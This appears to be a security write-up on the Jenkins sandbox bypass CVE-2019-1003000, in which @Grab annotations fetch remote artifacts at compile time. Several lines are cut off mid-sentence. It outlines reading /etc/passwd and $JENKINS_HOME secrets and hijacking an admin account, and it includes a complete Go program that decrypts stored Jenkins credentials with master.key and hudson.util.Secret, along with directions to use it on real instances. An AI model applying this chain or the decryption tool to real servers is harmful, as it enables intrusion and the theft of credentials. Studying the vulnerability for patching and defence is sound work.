Sandbox Bypass in Script Security and Pipeline Plugins
SECURITY-1266 / CVE-2019-1003000 (Script Security), CVE-2019-1003001 (Pipeline: Groovy), CVE-2019-1003002 (Pipeline: Declarative)
Script Security sandbox protection could be circumvented during the script compilation phase by applying AST-transforming annotations such as @Grab to source code elements. Both the pipeline validation REST APIs and actual script/pipeline execution are affected. This allowed users with Overall/Read permission, or able to control Jenkinsfile or sandboxed Pipeline shared library contents in SCM, to bypass the sandbox protection and execute arbitrary code on the Jenkins master. All known unsafe AST transformations in Groovy are now prohibited in sandboxed scripts.
The security-relevant point is the phase: the sandbox intercepts calls while the script runs, but an AST transformation executes inside the compiler, before any sandboxed code runs, so nothing it does is checked. The fix shipped in Script Security 1.50, Pipeline: Groovy 2.61.1 and Pipeline: Declarative 1.3.4.1; an instance on older versions should be treated as exposed to anyone with Overall/Read.
The GroovySandbox class creates the compiler configuration. There is an additional step that adds a compilation customizer,
RejectASTTransformsCustomizer, whose list of disabled transformations contains only a single value:
RejectASTTransformsCustomizer is a new class whose logic traverses the annotations on each source element and does a simple blacklist check against that list:
commons-lang:commons-lang:2.4 library as a dependency on the classpath. Then, we can import
@Grab, we can make Jenkins fetch arbitrary artifacts from an external Maven repository and load them while the build script is being compiled. Because the download and class loading happen in the compiler, the sandbox's runtime interception never sees them, and anything the fetched artifact executes (a static initializer, for instance) runs with the privileges of the Jenkins master process.
cat /etc/passwd in the job console output.
$JENKINS_HOME. In this directory, we can read (and modify) information about the users, jobs, etc. However, sensitive data (e.g. secrets) is encrypted.
$JENKINS_HOME directory. I am not saying that this is bad practice, because storing the key itself is a hard problem; search for the term "Secret Zero Problem" if you want to read more about it.
secrets/hudson.util.Secret. With these two files (the other one being secrets/master.key, which unwraps hudson.util.Secret), we can decrypt all the encrypted information inside Jenkins. For example, we can decrypt the Jenkins secrets stored in
credentials.xml. There are already many scripts on the internet for decrypting Jenkins secrets, e.g. jenkins-decrypt.
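To make the decryption step concrete, the following is an added example in Go; it is my code, not the author's and not the jenkins-decrypt script. It reimplements the Jenkins secret formats: the text of master.key is SHA-256 hashed and the first 16 bytes unwrap hudson.util.Secret (AES-128-ECB, plaintext followed by a ::::MAGIC:::: marker); the first 16 bytes of that plaintext then decrypt the values in credentials.xml, both the legacy AES-ECB layout with the marker appended and the current layout that starts with a 0x01 byte and carries an IV for AES-CBC. The master.key text, the hudson.util.Secret payload, the IV and the sample token are constructed fixtures generated inside the block, and all function names are mine.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/sha256"
	"encoding/base64"
	"encoding/binary"
	"errors"
	"fmt"
)

// Marker Jenkins appends to plaintext so that decryption under a wrong key is detected.
const magic = "::::MAGIC::::"

// keyFromMasterKey mirrors how Jenkins turns the text of secrets/master.key into an
// AES-128 key: SHA-256 of the file content, first 16 bytes.
func keyFromMasterKey(masterKey []byte) []byte {
	sum := sha256.Sum256(masterKey)
	return sum[:16]
}

// ecb runs raw AES-128 block by block (no chaining); src must be block aligned.
func ecb(key, src []byte, decrypt bool) ([]byte, error) {
	if len(src) == 0 || len(src)%aes.BlockSize != 0 {
		return nil, errors.New("input is not a whole number of AES blocks")
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	dst := make([]byte, len(src))
	for i := 0; i < len(src); i += aes.BlockSize {
		if decrypt {
			block.Decrypt(dst[i:i+aes.BlockSize], src[i:i+aes.BlockSize])
		} else {
			block.Encrypt(dst[i:i+aes.BlockSize], src[i:i+aes.BlockSize])
		}
	}
	return dst, nil
}

// unwrapHudsonSecret decrypts secrets/hudson.util.Secret with the master.key-derived key.
// The plaintext is the credentials key followed by the magic marker (plus PKCS#5 padding);
// Jenkins uses only its first 16 bytes as the AES key for stored secrets.
func unwrapHudsonSecret(masterKey, hudsonSecret []byte) ([]byte, error) {
	plain, err := ecb(keyFromMasterKey(masterKey), hudsonSecret, true)
	if err != nil {
		return nil, err
	}
	if !bytes.Contains(plain, []byte(magic)) {
		return nil, errors.New("magic marker missing: wrong master.key?")
	}
	return plain[:16], nil
}

// decryptSecret decrypts one base64 value as found in credentials.xml or a user's config.xml.
// Leading byte 0x01 selects the current layout:
//   0x01 | IV length (4 bytes BE) | data length (4 bytes BE) | IV | AES-128-CBC data, PKCS#5 padded
// Anything else is the legacy layout: AES-128-ECB over plaintext || magic, PKCS#5 padded.
func decryptSecret(key []byte, encoded string) (string, error) {
	raw, err := base64.StdEncoding.DecodeString(encoded)
	if err != nil {
		return "", err
	}
	if len(raw) > 0 && raw[0] == 1 {
		if len(raw) < 9 {
			return "", errors.New("truncated header")
		}
		ivLen := int(binary.BigEndian.Uint32(raw[1:5]))
		dataLen := int(binary.BigEndian.Uint32(raw[5:9]))
		if ivLen != aes.BlockSize || dataLen == 0 || dataLen%aes.BlockSize != 0 || len(raw) < 9+ivLen+dataLen {
			return "", errors.New("malformed new-format secret")
		}
		block, err := aes.NewCipher(key)
		if err != nil {
			return "", err
		}
		iv, data := raw[9:9+ivLen], raw[9+ivLen:9+ivLen+dataLen]
		plain := make([]byte, len(data))
		cipher.NewCBCDecrypter(block, iv).CryptBlocks(plain, data)
		// This layout carries no marker: a wrong key is only caught if the padding looks wrong.
		pad := int(plain[len(plain)-1])
		if pad < 1 || pad > aes.BlockSize {
			return "", errors.New("bad PKCS#5 padding: wrong key?")
		}
		return string(plain[:len(plain)-pad]), nil
	}
	plain, err := ecb(key, raw, true)
	if err != nil {
		return "", err
	}
	idx := bytes.Index(plain, []byte(magic))
	if idx < 0 {
		return "", errors.New("magic marker missing: wrong key?")
	}
	return string(plain[:idx]), nil
}

// ---- Constructed fixture: what a Jenkins instance holding these keys would write. ----
// Nothing below comes from a real installation.
var (
	masterKey = []byte("0123456789abcdef0123456789abcdef") // master.key text (real files are longer hex)
	credKey   = bytes.Repeat([]byte{0x42}, 32)            // hudson.util.Secret payload (really 256 random bytes)
	iv        = bytes.Repeat([]byte{0x07}, aes.BlockSize) // Jenkins picks a random IV per secret
)

func pkcs5Pad(b []byte) []byte {
	n := aes.BlockSize - len(b)%aes.BlockSize
	return append(append([]byte{}, b...), bytes.Repeat([]byte{byte(n)}, n)...)
}

func makeHudsonSecret() []byte {
	out, _ := ecb(keyFromMasterKey(masterKey), pkcs5Pad(append(append([]byte{}, credKey...), magic...)), false)
	return out
}

func encryptNewFormat(key []byte, text string) string {
	block, _ := aes.NewCipher(key)
	data := pkcs5Pad([]byte(text))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(data, data)
	hdr := make([]byte, 9)
	hdr[0] = 1
	binary.BigEndian.PutUint32(hdr[1:5], uint32(len(iv)))
	binary.BigEndian.PutUint32(hdr[5:9], uint32(len(data)))
	return base64.StdEncoding.EncodeToString(append(append(hdr, iv...), data...))
}

func encryptLegacy(key []byte, text string) string {
	out, _ := ecb(key, pkcs5Pad([]byte(text+magic)), false)
	return base64.StdEncoding.EncodeToString(out)
}

// roundTrip does what an attacker with read access to $JENKINS_HOME does: unwrap
// hudson.util.Secret with master.key, then decrypt stored secrets in both layouts.
func roundTrip(text string) (newFmt, legacy string, err error) {
	key, err := unwrapHudsonSecret(masterKey, makeHudsonSecret())
	if err != nil {
		return "", "", err
	}
	if newFmt, err = decryptSecret(key, encryptNewFormat(key, text)); err != nil {
		return "", "", err
	}
	legacy, err = decryptSecret(key, encryptLegacy(key, text))
	return newFmt, legacy, err
}

func main() {
	a, b, err := roundTrip("s3cr3t-api-token")
	fmt.Println(a, b, err)
	_, err = unwrapHudsonSecret([]byte("not-the-real-master-key"), makeHudsonSecret())
	fmt.Println("wrong master.key:", err)
}
```

On a real instance you would read the two files from $JENKINS_HOME/secrets/ and feed the base64 blobs from credentials.xml straight into decryptSecret; the fixture builders exist only so the block runs offline. Note the asymmetry the two branches expose: the legacy layout leaks a reliable "wrong key" signal through the marker, while the current layout gives an attacker (or you, when checking which master.key belongs to which backup) only the padding to go on.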
$JENKINS_HOME/users. Moreover, we can see data or state about each user at
$JENKINS_HOME/users/[user]/config.xml. In older Jenkins versions, if a user has generated API tokens before, those tokens are stored (encrypted with the same hudson.util.Secret key) and retrievable in that file; since Jenkins 2.129 the new token system stores only a hash, so on a current instance this file no longer yields a usable token.
Authorization HTTP header (HTTP Basic authentication with the username and the token). For demonstration, we can use curl to do whoami in Jenkins:
.bashrc, we can utilize the hijacked Jenkins admin account. Jenkins provides a script console that an admin can use to execute arbitrary Groovy scripts outside the sandbox, so at this point no further bypass is needed.
Job/Configure permission and optionally
Job/Build to trigger build execution. Nonetheless, this method shows how we can exploit CVE-2019-1003000 to bypass the sandbox and then execute arbitrary commands with a normal Jenkins user. Furthermore, this vulnerability can also be chained with previous vulnerabilities that allow unauthenticated RCE. I recommend reading this article.